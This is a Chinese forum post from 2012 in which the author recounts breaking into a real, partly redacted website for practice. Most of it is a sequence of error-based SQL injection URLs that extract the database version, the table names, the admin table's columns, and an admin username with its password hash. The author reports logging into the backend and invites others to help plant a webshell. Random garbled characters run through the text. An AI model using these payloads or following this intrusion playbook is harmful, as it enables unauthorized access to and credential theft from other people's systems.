近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。 w9 {0 r! N4 h& a2 P: a
首先找到网站后台,加了个admin,后台出来了 * D! p8 a1 `( _: Q
: G8 W) X( a) `% a
1 n5 O7 v) a8 U+ x* l# ~# |" n然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
! T' |4 U5 e, ^3 t# {6 D7 Qhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
% K1 i2 `' t' \$ ]3 V1 i, G. ?
1 h* n0 |, j% ]2 F3 v* u3 o. N0 C- U" v0 E$ w% v- A7 K# g
1 E: Z1 m+ e+ Y# m8 c! _
! W/ ~6 h2 y9 F9 U. r4 T6 [. p# fhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg: O+ f1 |* C1 m7 Q y$ u
; D- j, @7 R1 g z% Y
4 k0 y+ ^7 K2 \8 `' I7 V( p3 C: \ b& j, b
" z: V! I6 b a/ j8 R
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator( S* h% T" s; y, f q1 X. C
, c) m1 n1 ~; I0 R' v, c! T
/ S! W7 |; o0 s) c: m
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg
2 u; p$ ]' d) d, _" |
5 Y% z( F* y/ ]1 A
0 k" Z9 i3 z1 u" k6 x2 V 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--% f- e) V/ p k4 g3 n4 _
7 J& p3 m1 j: r7 d& e' H. o# S# c7 o+ e5 j, d, ~7 I, {2 r& A7 @
8 R8 @( G" z9 l9 k$ I/ e 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--( E; e3 M" [% Y
# Q$ Q( A9 T7 L1 B; F
# P% w/ B6 l/ a( c& O' y7 N% ^9 O2 F1 L p& l; H% ~4 u( m) k9 J
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 | 
发表于 2012-12-20 09:00:35
收藏
支持
反对